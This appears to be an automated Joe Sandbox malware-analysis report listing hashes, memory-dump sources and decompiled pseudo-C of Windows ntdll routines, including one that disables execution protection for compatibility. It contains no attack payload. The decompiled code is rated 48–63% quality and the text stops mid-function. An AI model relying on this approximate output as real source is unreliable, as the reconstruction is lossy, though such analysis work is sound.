                                                                                                                              • Instruction ID: bd6652ef6aa2c2e3e44ad912cbf42243af5801c99f82296fa37c39766fcedd79
                                                                                                                              • Opcode Fuzzy Hash: 7839b2edd2dd898a0f60f2eb185a88978b67886cec5c11581815bdbf7f071b39
                                                                                                                              • Instruction Fuzzy Hash: 5890023226101882D50461585504F4A000547E1321F91C55AA0118614DC629C8517533
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D782A10 Relevance: .0, Instructions: 4COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 5b154eac53f17049239444e849d145d35af4cf00327ee97dd91a537d76a67797
                                                                                                                              • Instruction ID: c31d2d0374acb09ed27c35c8369a482ccd898d680e52b59f6f7ca233330dfdf8
                                                                                                                              • Opcode Fuzzy Hash: 5b154eac53f17049239444e849d145d35af4cf00327ee97dd91a537d76a67797
                                                                                                                              • Instruction Fuzzy Hash: 21900226271010420549A558170490F044557D73713D1C559F140A550CC63588656333
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D782AC0 Relevance: .0, Instructions: 4COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 0a79f65d1cf77c7bb4b44e8cc9f715d80a525060e0193c2e54db32fd74a5bae6
                                                                                                                              • Instruction ID: 4e5a3d6423c4c316a9cd3e296026b4d8f2febf73ef3437a569dbe27615de1c01
                                                                                                                              • Opcode Fuzzy Hash: 0a79f65d1cf77c7bb4b44e8cc9f715d80a525060e0193c2e54db32fd74a5bae6
                                                                                                                              • Instruction Fuzzy Hash: AB90023266501842D55471585514B4A000547D1321F91C555A0018614DC7698A5576B3
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D782AA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 7cde42b2e8f197da28cc4d4f18e32c7f62c03737aaf8090451252b9f8c9a8b33
                                                                                                                              • Instruction ID: 2c78f864be4251d31f07fb9338f6501fc62aa2aefa9e0aa03b1c681a1bde22df
                                                                                                                              • Opcode Fuzzy Hash: 7cde42b2e8f197da28cc4d4f18e32c7f62c03737aaf8090451252b9f8c9a8b33
                                                                                                                              • Instruction Fuzzy Hash: 0390023226101842D50861585904A8A000547D1321F91C555A6018615ED67988917133
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D784570 Relevance: .0, Instructions: 4COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 51c9e76a907cf1df16afe1f94c8fb261519b94476395ecfe270a33d02c5d925d
                                                                                                                              • Instruction ID: 6a754d015bfca3488c4a16fe889f90f8dddaf1afeb9f10bd31a7defb25670ebe
                                                                                                                              • Opcode Fuzzy Hash: 51c9e76a907cf1df16afe1f94c8fb261519b94476395ecfe270a33d02c5d925d
                                                                                                                              • Instruction Fuzzy Hash: 6C9002626611108245447158590480A600557E23213D1C659A0548520CC62C8855A27B
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D784260 Relevance: .0, Instructions: 4COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 40ddea0b8a57009fe14e7968b45d02d69a2e2727cd70a398a10a4e7a5727b93a
                                                                                                                              • Instruction ID: 9f3810827c3aadaa39ec47333a1c7c94cd16cfb845bbca0906e4262215a02fdf
                                                                                                                              • Opcode Fuzzy Hash: 40ddea0b8a57009fe14e7968b45d02d69a2e2727cd70a398a10a4e7a5727b93a
                                                                                                                              • Instruction Fuzzy Hash: 8C9002326654105295447158598494A400557E1321B91C555E0418514CCA2889566373
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D782B20 Relevance: .0, Instructions: 2COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                              • Instruction ID: b64510c416b3116615fb886bb9bbfd7a740d7df0ba61485a11ffd4f9fc92c1ca
                                                                                                                              • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D81A1F0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 285timeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                              • String ID: HEAP:
                                                                                                                              • API String ID: 3446177414-2466845122
                                                                                                                              • Opcode ID: a7f33b4d6baef06978227e18db23846ca8a985584346411e5fcc15ca73dac8bb
                                                                                                                              • Instruction ID: 50646c2d3f1e7d327fd7241aee5380d105375803e95d837cfed71f292dc5acb0
                                                                                                                              • Opcode Fuzzy Hash: a7f33b4d6baef06978227e18db23846ca8a985584346411e5fcc15ca73dac8bb
                                                                                                                              • Instruction Fuzzy Hash: B2A18B75A082268FC705CF18C894A2BB7E5BF88750F05496DF945DB311E770EC4ACB92
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D777550 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 194COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 63%
                                                                                                                              			E1D777550(void* __ecx) {
				signed int _v8;
				char _v548;
				unsigned int _v552;
				unsigned int _v556;
				unsigned int _v560;
				char _v564;
				char _v568;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t49;
				signed char _t53;
				unsigned int _t55;
				unsigned int _t56;
				unsigned int _t65;
				unsigned int _t66;
				void* _t68;
				unsigned int _t73;
				unsigned int _t77;
				unsigned int _t85;
				char* _t98;
				unsigned int _t102;
				signed int _t103;
				void* _t105;
				signed int _t107;
				void* _t108;
				void* _t110;
				void* _t111;
				void* _t112;

				_t45 =  *0x1d83b370 ^ _t107;
				_v8 =  *0x1d83b370 ^ _t107;
				_t105 = __ecx;
				if( *0x1d836664 == 0) {
					L5:
					return E1D784B50(_t45, _t85, _v8 ^ _t107, _t102, _t105, _t106);
				}
				_t85 = 0;
				E1D74E580(3,  *((intOrPtr*)(__ecx + 0x18)), 0, 0,  &_v564);
				if(( *0x7ffe02d5 & 0x00000003) == 0) {
					_t45 = 0;
				} else {
					_t45 =  *(_v564 + 0x5f) & 0x00000001;
				}
				if(_t45 == 0) {
					_v556 = _t85;
					_t49 = E1D777738(_t105);
					__eflags = _t49;
					if(_t49 != 0) {
						L15:
						_t103 = 2;
						_v556 = _t103;
						L10:
						__eflags = ( *0x7ffe02d5 & 0x0000000c) - 4;
						if(( *0x7ffe02d5 & 0x0000000c) == 4) {
							_t45 = 1;
						} else {
							_t53 = E1D77763B(_v564);
							asm("sbb al, al");
							_t45 =  ~_t53 + 1;
							__eflags = _t45;
						}
						__eflags = _t45;
						if(_t45 == 0) {
							_t102 = _t103 | 0x00000040;
							_v556 = _t102;
						}
						__eflags = _t102;
						if(_t102 != 0) {
							L33:
							_push(4);
							_push( &_v556);
							_push(0x22);
							_push(0xffffffff);
							_t45 = E1D782B70();
						}
						goto L4;
					}
					_v552 = _t85;
					_t102 =  &_v552;
					_t55 = E1D7776ED(_t105 + 0x2c, _t102);
					__eflags = _t55;
					if(_t55 >= 0) {
						__eflags = _v552 - _t85;
						if(_v552 == _t85) {
							goto L8;
						}
						_t85 = _t105 + 0x24;
						E1D7CEF10(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v552);
						_v560 = 0x214;
						E1D788F40( &_v548, 0, 0x214);
						_t106 =  *0x1d836664;
						_t110 = _t108 + 0x20;
						 *0x1d8391e0( *((intOrPtr*)(_t105 + 0x28)),  *((intOrPtr*)(_t105 + 0x18)),  *((intOrPtr*)(_t105 + 0x20)), L"ExecuteOptions",  &_v568,  &_v548,  &_v560, _t85);
						_t65 =  *((intOrPtr*)( *0x1d836664))();
						__eflags = _t65;
						if(_t65 == 0) {
							goto L8;
						}
						_t66 = _v560;
						__eflags = _t66;
						if(_t66 == 0) {
							goto L8;
						}
						__eflags = _t66 - 0x214;
						if(_t66 >= 0x214) {
							goto L8;
						}
						_t68 = (_t66 >> 1) * 2 - 2;
						__eflags = _t68 - 0x214;
						if(_t68 >= 0x214) {
							E1D784C68();
							goto L33;
						}
						_push(_t85);
						 *((short*)(_t107 + _t68 - 0x220)) = 0;
						E1D7CEF10(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v548);
						_t111 = _t110 + 0x14;
						_t73 = E1D78A9C0( &_v548, L"Execute=1");
						_push(_t85);
						__eflags = _t73;
						if(_t73 == 0) {
							E1D7CEF10(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v548);
							_t106 =  &_v548;
							_t98 =  &_v548;
							_t112 = _t111 + 0x14;
							_t77 = _v560 + _t98;
							_v552 = _t77;
							__eflags = _t98 - _t77;
							if(_t98 >= _t77) {
								goto L8;
							} else {
								goto L27;
							}
							do {
								L27:
								_t85 = E1D78A690(_t106, 0x20);
								__eflags = _t85;
								if(__eflags != 0) {
									__eflags = 0;
									 *_t85 = 0;
								}
								E1D7CEF10(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t106);
								_t112 = _t112 + 0x10;
								E1D7BCC1E(_t105, _t106, __eflags);
								__eflags = _t85;
								if(_t85 == 0) {
									goto L8;
								}
								_t41 = _t85 + 2; // 0x2
								_t106 = _t41;
								__eflags = _t106 - _v552;
							} while (_t106 < _v552);
							goto L8;
						}
						_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
						_push(3);
						_push(0x55);
						E1D7CEF10();
						goto L15;
					}
					L8:
					_t56 = E1D777648(_t105);
					__eflags = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					_t103 = _v556;
					goto L10;
				} else {
					L4:
					 *(_t105 + 0x34) =  *(_t105 + 0x34) | 0x80000000;
					goto L5;
				}
			}
































                                                                                                                              0x1d777560
                                                                                                                              0x1d777562
                                                                                                                              0x1d77756f
                                                                                                                              0x1d777571
                                                                                                                              0x1d7775ab
                                                                                                                              0x1d7775b9
                                                                                                                              0x1d7775b9
                                                                                                                              0x1d777579
                                                                                                                              0x1d777583
                                                                                                                              0x1d77758f
                                                                                                                              0x1d7b4443
                                                                                                                              0x1d777595
                                                                                                                              0x1d77759e
                                                                                                                              0x1d77759e
                                                                                                                              0x1d7775a2
                                                                                                                              0x1d7775bc
                                                                                                                              0x1d7775c2
                                                                                                                              0x1d7775c7
                                                                                                                              0x1d7775c9
                                                                                                                              0x1d777621
                                                                                                                              0x1d777623
                                                                                                                              0x1d777624
                                                                                                                              0x1d7775f8
                                                                                                                              0x1d7775ff
                                                                                                                              0x1d777601
                                                                                                                              0x1d77762c
                                                                                                                              0x1d777603
                                                                                                                              0x1d777609
                                                                                                                              0x1d777610
                                                                                                                              0x1d777612
                                                                                                                              0x1d777612
                                                                                                                              0x1d777612
                                                                                                                              0x1d777614
                                                                                                                              0x1d777616
                                                                                                                              0x1d777630
                                                                                                                              0x1d777633
                                                                                                                              0x1d777633
                                                                                                                              0x1d777618
                                                                                                                              0x1d77761a
                                                                                                                              0x1d7b45c9
                                                                                                                              0x1d7b45c9
                                                                                                                              0x1d7b45d1
                                                                                                                              0x1d7b45d2
                                                                                                                              0x1d7b45d4
                                                                                                                              0x1d7b45d6
                                                                                                                              0x1d7b45d6
                                                                                                                              0x00000000
                                                                                                                              0x1d77761a
                                                                                                                              0x1d7775ce
                                                                                                                              0x1d7775d4
                                                                                                                              0x1d7775da
                                                                                                                              0x1d7775df
                                                                                                                              0x1d7775e1
                                                                                                                              0x1d7b444a
                                                                                                                              0x1d7b4450
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7b4456
                                                                                                                              0x1d7b4469
                                                                                                                              0x1d7b4476
                                                                                                                              0x1d7b4486
                                                                                                                              0x1d7b448b
                                                                                                                              0x1d7b4497
                                                                                                                              0x1d7b44b9
                                                                                                                              0x1d7b44bf
                                                                                                                              0x1d7b44c1
                                                                                                                              0x1d7b44c3
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7b44c9
                                                                                                                              0x1d7b44cf
                                                                                                                              0x1d7b44d1
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7b44dc
                                                                                                                              0x1d7b44de
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7b44e6
                                                                                                                              0x1d7b44ed
                                                                                                                              0x1d7b44ef
                                                                                                                              0x1d7b45c4
                                                                                                                              0x00000000
                                                                                                                              0x1d7b45c4
                                                                                                                              0x1d7b44f7
                                                                                                                              0x1d7b44f8
                                                                                                                              0x1d7b4510
                                                                                                                              0x1d7b4515
                                                                                                                              0x1d7b4524
                                                                                                                              0x1d7b452b
                                                                                                                              0x1d7b452c
                                                                                                                              0x1d7b452e
                                                                                                                              0x1d7b4556
                                                                                                                              0x1d7b4561
                                                                                                                              0x1d7b4567
                                                                                                                              0x1d7b4569
                                                                                                                              0x1d7b456c
                                                                                                                              0x1d7b456e
                                                                                                                              0x1d7b4574
                                                                                                                              0x1d7b4576
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7b457c
                                                                                                                              0x1d7b457c
                                                                                                                              0x1d7b4584
                                                                                                                              0x1d7b4588
                                                                                                                              0x1d7b458a
                                                                                                                              0x1d7b458c
                                                                                                                              0x1d7b458e
                                                                                                                              0x1d7b458e
                                                                                                                              0x1d7b459b
                                                                                                                              0x1d7b45a0
                                                                                                                              0x1d7b45a7
                                                                                                                              0x1d7b45ac
                                                                                                                              0x1d7b45ae
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7b45b4
                                                                                                                              0x1d7b45b4
                                                                                                                              0x1d7b45b7
                                                                                                                              0x1d7b45b7
                                                                                                                              0x00000000
                                                                                                                              0x1d7b45bf
                                                                                                                              0x1d7b4530
                                                                                                                              0x1d7b4535
                                                                                                                              0x1d7b4537
                                                                                                                              0x1d7b4539
                                                                                                                              0x00000000
                                                                                                                              0x1d7b453e
                                                                                                                              0x1d7775e7
                                                                                                                              0x1d7775e9
                                                                                                                              0x1d7775ee
                                                                                                                              0x1d7775f0
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7775f2
                                                                                                                              0x00000000
                                                                                                                              0x1d7775a4
                                                                                                                              0x1d7775a4
                                                                                                                              0x1d7775a4
                                                                                                                              0x00000000
                                                                                                                              0x1d7775a4

                                                                                                                              Strings
                                                                                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 1D7B4507
                                                                                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 1D7B4592
                                                                                                                              • ExecuteOptions, xrefs: 1D7B44AB
                                                                                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 1D7B454D
                                                                                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 1D7B4530
                                                                                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 1D7B4460
                                                                                                                              • Execute=1, xrefs: 1D7B451E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                              • API String ID: 0-484625025
                                                                                                                              • Opcode ID: fa2e8af57f63ba083da60b468eb474390ca1a73dc54d9b064e27c6fa53e3afd5
                                                                                                                              • Instruction ID: 8b3007148eef96e2d4ba1fbad855b0cd9b0ed14f17584465fee48dda864e8c16
                                                                                                                              • Opcode Fuzzy Hash: fa2e8af57f63ba083da60b468eb474390ca1a73dc54d9b064e27c6fa53e3afd5
                                                                                                                              • Instruction Fuzzy Hash: D4511E355042597ADF119B94EC8EFFDB368BF04734F0109EAD605A7191E770AA41CB53
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D75A170 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 404COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 48%
                                                                                                                              			E1D75A170(signed char _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v12;
				signed int _v16;
				intOrPtr _v20;
				signed char _v24;
				intOrPtr _v28;
				char _v36;
				char _v40;
				intOrPtr _v44;
				char _v48;
				intOrPtr _v52;
				char _v56;
				signed int _v60;
				char _v64;
				intOrPtr _v68;
				void* _v72;
				void* _v76;
				void* _v80;
				void* _v84;
				void* _v85;
				void* _v88;
				void* _v96;
				void* _v109;
				intOrPtr _t128;
				void* _t129;
				intOrPtr* _t130;
				intOrPtr _t135;
				void* _t136;
				intOrPtr _t145;
				intOrPtr _t151;
				intOrPtr* _t164;
				intOrPtr _t165;
				signed int _t166;
				intOrPtr _t172;
				intOrPtr _t173;
				intOrPtr _t176;
				signed int _t177;
				intOrPtr _t178;
				intOrPtr _t181;
				void* _t190;
				intOrPtr* _t191;
				intOrPtr _t201;
				signed int _t202;
				void* _t203;
				signed char _t213;
				intOrPtr _t214;
				intOrPtr _t217;
				signed int _t219;
				signed int _t224;
				intOrPtr _t228;
				intOrPtr _t229;
				signed int _t234;
				void* _t236;
				signed int _t240;
				void* _t242;

				_t178 =  *[fs:0x18];
				_t242 = (_t240 & 0xfffffff8) - 0x3c;
				_t128 =  *((intOrPtr*)(_t178 + 0x30));
				if( *((intOrPtr*)(_t128 + 0x1f8)) == 0) {
					if( *((intOrPtr*)(_t128 + 0x200)) != 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x1a8)))) != 0) {
						goto L1;
					} else {
						_t129 = 0xc0150001;
						goto L33;
					}
				} else {
					L1:
					_v48 = 0;
					_v36 = 0xffffffff;
					_v40 = 0;
					if(_a16 == 0) {
						L83:
						_t129 = 0xc000000d;
						goto L33;
					} else {
						_t213 = _a4;
						if((_t213 & 0xfffffff8) != 0) {
							goto L83;
						} else {
							_t130 = _a20;
							if((_t213 & 0x00000007) == 0) {
								if(_t130 != 0) {
									goto L5;
								} else {
									goto L6;
								}
							} else {
								if(_t130 == 0) {
									goto L83;
								} else {
									L5:
									if( *_t130 < 0x24) {
										goto L83;
									} else {
										L6:
										if((_t213 & 0x00000002) == 0) {
											L9:
											if((_t213 & 0x00000004) != 0) {
												if(_t130 + 0x40 <=  *_t130 + _t130) {
													goto L10;
												} else {
													_push(0xc000000d);
													_push("RtlpFindActivationContextSection_CheckParameters");
													_push("SXS: %s() flags contains return_assembly_metadata but they don\'t fit in size, return invalid_parameter 0x%08lx.\n");
													goto L82;
												}
											} else {
												L10:
												_t233 = _a8;
												_v24 = _t213;
												_t214 =  *[fs:0x18];
												_v16 = _a12;
												_v12 = 0;
												_t172 = _v12;
												_t181 =  *((intOrPtr*)(_t214 + 0x30));
												_v28 = 0x18;
												_v8 = 0;
												_v20 = _a8;
												_v60 = 0;
												_v52 = _t214;
												_v44 = _t181;
												while(1) {
													_t135 = _t172;
													if(_t135 != 0) {
														goto L34;
													}
													_t164 =  *((intOrPtr*)(_t214 + 0x1a8));
													if(_t164 == 0) {
														L14:
														_t228 =  *((intOrPtr*)(_t181 + 0x1f8));
														_v60 = 0;
														if(_t228 == 0) {
															L36:
															_t228 =  *((intOrPtr*)(_t181 + 0x200));
															_v60 = 0xfffffffc;
															if(_t228 == 0) {
																L87:
																if(_t172 <= 3) {
																	goto L16;
																} else {
																	_t129 = 0xc00000e5;
																	goto L90;
																}
															} else {
																_t172 = 3;
																_v12 = 3;
																goto L16;
															}
														} else {
															_t172 = 2;
															_v12 = 2;
															goto L16;
														}
													} else {
														_t165 =  *_t164;
														if(_t165 != 0) {
															_t166 =  *((intOrPtr*)(_t165 + 4));
															_v60 = _t166;
															if(_t166 != 0) {
																if(_t166 == 0xfffffffc) {
																	_t228 =  *((intOrPtr*)(_t181 + 0x200));
																	goto L56;
																} else {
																	if(_t166 == 0xfffffffd) {
																		_t228 = "Actx ";
																		goto L57;
																	} else {
																		_t228 =  *((intOrPtr*)(_t166 + 0x10));
																		goto L56;
																	}
																}
															} else {
																L56:
																if(_t228 == 0) {
																	goto L14;
																} else {
																	L57:
																	_t172 = 1;
																	_v12 = 1;
																	L16:
																	if(_t228 == 0) {
																		_t129 = 0xc0150001;
																		L90:
																		_t234 = 0;
																		goto L91;
																	} else {
																		_t129 = E1D75A600(_t228, _t233, _a12,  &_v56,  &_v48);
																		if(_t129 < 0) {
																			_t234 = 0;
																			if(_t129 != 0xc0150001 || _t172 == 3) {
																				goto L19;
																			} else {
																				_t181 = _v44;
																				_t214 = _v52;
																				_t233 = _a8;
																				continue;
																			}
																		} else {
																			_t224 = _v60;
																			_v8 = (0 | _t224 != 0xfffffffc) - 0x00000001 & 0x00000002 | 0 | _t224 == 0x00000000;
																			asm("sbb esi, esi");
																			_t234 =  ~(_t224 - 0xfffffffc) & _t224;
																			_t129 = 0;
																			L19:
																			if(_t129 < 0) {
																				L91:
																				if(_t129 < 0) {
																					goto L33;
																				} else {
																					goto L20;
																				}
																			} else {
																				L20:
																				_t173 = _v48;
																				if(_t173 < 0x2c) {
																					L110:
																					_t138 = _v56;
																					goto L111;
																				} else {
																					_t229 = _a20;
																					while(1) {
																						L22:
																						_t138 = _v56;
																						if( *_v56 != 0x64487353) {
																							break;
																						}
																						_t242 = _t242 - 8;
																						_t129 = E1D75A760(_t138, _t173, _a16, _t229,  &_v36,  &_v40);
																						if(_t129 >= 0) {
																							_t83 = _t234 - 1; // -1
																							if((_t83 | 0x00000007) != 0xffffffff) {
																								_t145 =  *((intOrPtr*)(_t234 + 0x14));
																								_v40 = _t145;
																								if(_t145 != 0 && (( *(_t234 + 0x1c) & 0x00000008) == 0 || ( *(_t234 + 0x3c) & 0x00000008) == 0)) {
																									 *((char*)(_t242 + 0xf)) = 0;
																									 *0x1d8391e0(3, _t234,  *((intOrPtr*)(_t234 + 0x10)),  *((intOrPtr*)(_t234 + 0x18)), 0, _t242 + 0xf);
																									_v40();
																									 *(_t234 + 0x1c) =  *(_t234 + 0x1c) | 0x00000008;
																									if( *((char*)(_t242 + 0xf)) != 0) {
																										 *(_t234 + 0x3c) =  *(_t234 + 0x3c) | 0x00000008;
																									}
																								}
																							}
																							if(_t229 == 0) {
																								L67:
																								return 0;
																							} else {
																								_t129 = E1D744428(_a4, _t229, _t234,  &_v36, _v64,  *((intOrPtr*)(_v64 + 0x24)),  *((intOrPtr*)(_v64 + 0x28)), _t173);
																								if(_t129 < 0) {
																									goto L33;
																								} else {
																									goto L67;
																								}
																							}
																						} else {
																							if(_t129 != 0xc0150008) {
																								L33:
																								return _t129;
																							} else {
																								_t217 =  *[fs:0x18];
																								_t234 = 0;
																								_v68 = 0;
																								_v40 = _t217;
																								_v60 = 0;
																								_v52 =  *((intOrPtr*)(_t217 + 0x30));
																								_t176 = _v20;
																								L26:
																								while(1) {
																									if(_t176 <= 2) {
																										_t190 = _t176 - _t234;
																										if(_t190 == 0) {
																											_t191 =  *((intOrPtr*)(_t217 + 0x1a8));
																											if(_t191 == 0) {
																												goto L68;
																											} else {
																												_t201 =  *_t191;
																												if(_t201 == 0) {
																													goto L68;
																												} else {
																													_t202 =  *((intOrPtr*)(_t201 + 4));
																													_v60 = _t202;
																													if(_t202 == 0) {
																														L102:
																														if(_t151 == 0) {
																															goto L68;
																														} else {
																															goto L103;
																														}
																													} else {
																														if(_t202 != 0xfffffffc) {
																															if(_t202 != 0xfffffffd) {
																																_t151 =  *((intOrPtr*)(_t202 + 0x10));
																																goto L101;
																															} else {
																																_t151 = "Actx ";
																																_v68 = _t151;
																																L103:
																																_t176 = 1;
																																_v20 = 1;
																																goto L28;
																															}
																														} else {
																															_t151 =  *((intOrPtr*)(_v52 + 0x200));
																															L101:
